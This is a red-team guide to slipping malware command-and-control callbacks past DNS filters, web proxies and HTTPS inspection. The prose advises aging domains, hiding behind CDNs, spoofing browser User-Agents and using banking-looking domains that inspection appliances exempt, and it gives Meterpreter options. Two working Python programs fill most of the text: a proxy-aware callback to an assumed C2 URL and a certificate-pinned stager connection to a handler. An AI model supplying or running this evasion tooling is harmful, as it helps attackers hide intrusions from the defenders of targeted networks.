Filter Bypasses

Filtering DNS resolvers such as OpenDNS compare each queried domain name against a list of known malicious domains. If a host that uses the OpenDNS resolver tries to resolve a domain on that list, the resolver either answers with a safe sinkhole IP address instead of the real one or drops the query entirely.

DNS filters also have a category called "Newly Seen Domain" for domains the resolver has not observed before. Simply registering a fresh domain for command-and-control infrastructure is therefore not always enough, because the domain can be blocked purely for being new.

The "Newly Seen Domain" category can be bypassed by registering domains well ahead of the engagement and giving them a history: submit them to search engines, host ordinary-looking content on them, and resolve and browse them through OpenDNS for seemingly legitimate use cases so that the filter classifies them as "Clean/Harmless". Choose names that read like normal domains; l33t speak or random UUID-style names are a sure way to be flagged by DNS filters. Done properly, this process can take months. Another option, when possible, is to place the callback endpoint behind a widely used hosting or CDN provider such as CloudFront, wordpress.com, or azurewebsites.net, whose domains are already categorized and trusted.

When a web proxy is in place, the payload used for reverse shell callbacks needs to be proxy aware; otherwise its direct outbound connection is simply blocked. One way to make a native Windows payload proxy aware is to use the InternetSetOptionA Windows API to apply the proxy settings WinINet should use (the system-configured proxy, or one set explicitly). The User-Agent header is another important consideration: a User-Agent identifying meterpreter, or any value that does not match the browsers in the environment, will probably raise suspicions, so match it to the target environment.
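As an added illustration of the proxy-aware callback and User-Agent points above (example code written for this page, not Meterpreter's or the Metasploit project's code), the following Python reads the same proxy configuration that WinINet uses, parses the Windows `ProxyServer` registry value format, and routes an HTTPS callback through that proxy with a browser-like User-Agent. The proxy addresses, the `BROWSER_UA` string and `CALLBACK_URL` are assumed values for the example.

```python
"""Proxy-aware HTTPS callback (added example; not Metasploit code)."""
import urllib.request

# Assumed values for the example: pick a UA that matches the target's browsers.
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
CALLBACK_URL = "https://updates.example-corp.net/api/v1/status"  # assumed


def _with_scheme(addr):
    # The proxy itself is reached over plain HTTP (CONNECT for https URLs),
    # so a bare "host:port" becomes "http://host:port".
    return addr if "://" in addr else "http://" + addr


def parse_windows_proxy_server(value):
    """Parse the ProxyServer string WinINet stores under
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings.

    Two formats exist: "host:port" (applies to every protocol) or
    "http=host:port;https=host:port;ftp=host:port".
    Returns a dict usable by urllib.request.ProxyHandler.
    """
    proxies = {}
    value = value.strip()
    if not value:
        return proxies
    if "=" in value:
        for entry in value.split(";"):
            scheme, sep, addr = entry.partition("=")
            scheme, addr = scheme.strip().lower(), addr.strip()
            if not sep or not scheme or not addr:
                continue
            proxies[scheme] = _with_scheme(addr)
    else:
        for scheme in ("http", "https", "ftp"):
            proxies[scheme] = _with_scheme(value)
    return proxies


def discover_proxies():
    """Proxy settings from the environment (HTTP(S)_PROXY), the Windows
    registry or the macOS system configuration, whichever applies."""
    return urllib.request.getproxies()


def build_opener(proxies, user_agent=BROWSER_UA):
    """Opener that sends every request through `proxies` with a browser UA."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler(proxies))
    opener.addheaders = [("User-Agent", user_agent)]
    return opener


def callback(url=CALLBACK_URL, proxies=None, timeout=10):
    """Perform one callback through the discovered proxy; returns the HTTP status."""
    proxies = discover_proxies() if proxies is None else proxies
    opener = build_opener(proxies)
    with opener.open(url, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    print("system proxies:", discover_proxies())
    print("status:", callback())
```

On Windows, `urllib.request.getproxies()` reads the same `ProxyEnable`/`ProxyServer` registry values that WinINet consults, so the callback follows the user's configured proxy without any hard-coded address; `parse_windows_proxy_server` is shown separately so the value format is explicit if you read the registry yourself.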

To avoid HTTPS inspection, testers can use TLS certificate pinning so that a man-in-the-middle inspection device cannot transparently decrypt the callback traffic. HTTPS inspection is typically done by a dedicated device that terminates TLS and re-signs the connection with its own certificate; it is good to assume that traffic will be inspected and plan accordingly. With pinning, the stager refuses to connect if the certificate it sees is not the handler's, so the payload is never exposed to the inspection device (the failed connection itself may still be logged). Combining TLS certificate pinning with a callback domain that looks like, and ideally is categorized as, a banking or finance site (categories that inspection appliances commonly exempt from decryption for privacy reasons) should help avoid detection. For meterpreter, TLS pinning is enabled by setting StagerVerifySSLCert to true and configuring HandlerSSLCert with a custom generated certificate on the handler; the payload must be generated with the same options so that the certificate hash is embedded in the stager.
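The following Python is an added example (not Metasploit's stager code) of the check that StagerVerifySSLCert enables: the SHA-1 hash of the handler's DER-encoded certificate is embedded in the stager, and after the TLS handshake the peer certificate is hashed and compared before anything else is sent. Because the handler certificate is self-signed, chain validation is disabled and the pin is the only check, which is exactly what makes the connection fail when an inspection device substitutes its own certificate. `HANDLER_HOST`, the port and the constructed sample certificate bytes are assumptions for the example.

```python
"""TLS certificate pinning for a stager, in the style of Meterpreter's
StagerVerifySSLCert (added example; not Metasploit code)."""
import base64
import hashlib
import socket
import ssl

HANDLER_HOST = "banking.example-portal.net"  # assumed for the example
HANDLER_PORT = 443


def pin_from_der(der_bytes):
    """SHA-1 fingerprint of a DER-encoded certificate, hex-encoded."""
    return hashlib.sha1(der_bytes).hexdigest()


def pin_from_pem(pem_text):
    """Compute the pin to embed from the handler's PEM certificate
    (the file you would pass as HandlerSSLCert)."""
    return pin_from_der(ssl.PEM_cert_to_DER_cert(pem_text))


def pin_matches(peer_der, expected_pin):
    """True only if the presented certificate hashes to the embedded pin."""
    return pin_from_der(peer_der).lower() == expected_pin.lower()


class PinMismatch(Exception):
    """Raised when the peer presents a certificate other than the handler's."""


def connect_pinned(host, port, expected_pin, timeout=10):
    """Open a TLS connection and verify the peer certificate by pin only.

    Chain and hostname validation are turned off because the handler
    certificate is self-signed. An inspection device that re-signs the
    connection presents a different certificate, the pin check fails and
    the socket is closed before any stage is requested."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    raw = socket.create_connection((host, port), timeout=timeout)
    tls = ctx.wrap_socket(raw, server_hostname=host)
    peer_der = tls.getpeercert(binary_form=True)
    if not pin_matches(peer_der, expected_pin):
        tls.close()
        raise PinMismatch("certificate does not match the handler pin: "
                          + pin_from_der(peer_der))
    return tls


# Constructed sample "certificate" bytes for an offline demonstration of the
# hashing and PEM handling; not a real X.509 structure.
SAMPLE_DER = b"constructed DER bytes standing in for the handler certificate"
SAMPLE_PEM = ("-----BEGIN CERTIFICATE-----\n"
              + base64.encodebytes(SAMPLE_DER).decode("ascii")
              + "-----END CERTIFICATE-----\n")
SAMPLE_PIN = pin_from_der(SAMPLE_DER)


if __name__ == "__main__":
    print("pin to embed in the stager:", pin_from_pem(SAMPLE_PEM))
    try:
        tls = connect_pinned(HANDLER_HOST, HANDLER_PORT, SAMPLE_PIN)
        tls.close()
        print("pin verified")
    except (OSError, PinMismatch) as err:
        print("connection refused by pin check or network:", err)
```

The pin is computed once from the handler's certificate file and baked into the stager; only `connect_pinned` runs on the target, and it never reads a certificate store, so there is no trust root an inspection device could be added to.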
